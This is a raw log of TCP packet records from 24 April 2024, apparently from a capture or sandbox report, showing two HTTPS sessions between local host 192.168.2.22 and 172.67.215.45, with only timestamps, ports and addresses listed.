Apr 24, 2024 07:32:46.123461962 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.124746084 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.124782085 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.124824047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.124835014 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.124856949 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.125669956 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.125699997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.125742912 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.125755072 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.125771046 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.126796007 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.126831055 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.126869917 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.126882076 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.126894951 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.128009081 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128038883 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128079891 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.128087044 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128129959 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.128827095 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128859997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128896952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.128904104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.128926992 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.130145073 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130176067 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130222082 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.130239010 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130253077 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.130824089 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130861998 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130898952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.130907059 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.130939007 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.131841898 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.131874084 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.131920099 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.131927967 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.131938934 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.133168936 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.133203983 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.133244038 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.133258104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.133274078 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.134154081 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.134182930 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.134227037 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.134238005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.134291887 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.135823011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.135863066 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.135900021 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.135906935 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.135940075 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.136900902 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.136929035 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.136971951 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.136980057 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.137001991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.138000011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.138041019 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.138086081 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.138092995 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.138115883 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.139082909 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.139111996 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.139152050 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.139159918 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.139192104 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.139971018 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140007973 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140036106 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.140043020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140070915 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.140727997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140754938 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140798092 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.140804052 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.140829086 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.141817093 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.141855001 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.141891003 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.141897917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.141921043 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.143388987 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.143418074 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.143457890 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.143465996 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.143515110 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.144865036 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.144901991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.144934893 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.144941092 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.144974947 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.145886898 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.145915985 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.145956039 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.145963907 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.145989895 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.146704912 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.146740913 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.146771908 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.146779060 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.146826982 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.147603989 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.147633076 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.147681952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.147690058 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.147716999 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.148713112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.148749113 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.148785114 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.148794889 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.148818016 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.149915934 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.149945021 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.149981022 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.149988890 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.150021076 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.150965929 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.151000023 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.151043892 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.151056051 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.151073933 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.151928902 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.151957989 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.151998043 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.152005911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.152031898 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.153095961 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153136969 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153172016 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.153182030 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153211117 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.153894901 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153923035 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153970003 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.153979063 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.153999090 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.154658079 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.154695034 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.154731035 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.154738903 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.154763937 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.155811071 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.155839920 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.155888081 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.155895948 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.155940056 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.156471014 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.156510115 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.156542063 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.156548977 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.156605959 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.156661034 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.176287889 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.883444071 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.883507967 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.883573055 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.884119034 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.884139061 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.210719109 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.227068901 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.227098942 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582075119 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582118034 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582159042 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582192898 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582252026 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.582278013 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582328081 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582334042 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.582344055 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582403898 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.582818985 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582870007 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.582923889 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.582935095 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.583636045 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.583679914 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.583688021 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.583695889 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.583750963 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.584409952 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.584511995 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.584539890 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.584563971 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.584577084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.584626913 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.585274935 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.585406065 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.585454941 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.585470915 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.586249113 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.586292028 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.586298943 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.586314917 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.586371899 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.586380959 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.587115049 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.587162971 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.587187052 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.587201118 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.587258101 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.587265968 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.588032007 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.588083982 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.588094950 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.588264942 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.588316917 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.588326931 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.589093924 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.589126110 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.589144945 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.589158058 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.589211941 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.589739084 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.590019941 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.590059996 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.590066910 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.590080023 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.590131044 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.590637922 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.590965033 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.591013908 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.591026068 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.591865063 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.591918945 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.591933012 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.605835915 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.606254101 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.742275953 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.742383957 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.742404938 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.743480921 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.743580103 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.743588924 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.743988991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.744041920 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.744050026 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.744210958 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.744271040 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.744278908 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.744672060 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.744788885 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.744854927 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.744945049 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.745795012 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.745858908 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.746939898 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.747015953 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.747163057 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.747220039 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.748146057 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.748231888 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.748509884 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.748569012 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.749912977 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.749969959 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.750936985 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.751002073 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.751147985 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.751200914 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.751734018 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.751789093 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.752322912 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.752387047 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.783476114 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.792227030 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.792324066 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.792428017 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.792488098 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.902961016 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.903126955 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.903189898 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.903250933 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.903748989 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.903811932 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.904768944 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.904833078 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.905189991 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.905249119 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.906039000 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.906092882 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.906774998 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.906852007 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.907001972 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.907052040 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.907824039 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.907881021 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.908719063 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.908772945 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.909625053 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.909682035 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.910366058 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.910419941 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.910900116 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.910959005 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.912189007 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.912245035 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.912451029 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.912503958 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.913266897 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.913345098 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.913443089 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.913497925 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:47.914380074 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:47.914439917 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.104898930 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.104940891 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.104962111 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.105026960 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.105036974 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.105066061 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.105074883 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.105114937 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.105124950 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.105161905 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.105215073 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.105968952 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.105974913 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.106023073 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.106082916 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.106089115 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.106106043 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.106164932 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.106213093 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.106925964 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.106933117 CEST	443	49166	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:48.106981993 CEST	49166	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:48.107093096 CEST	49166	443	192.168.2.22	172.67.215.45
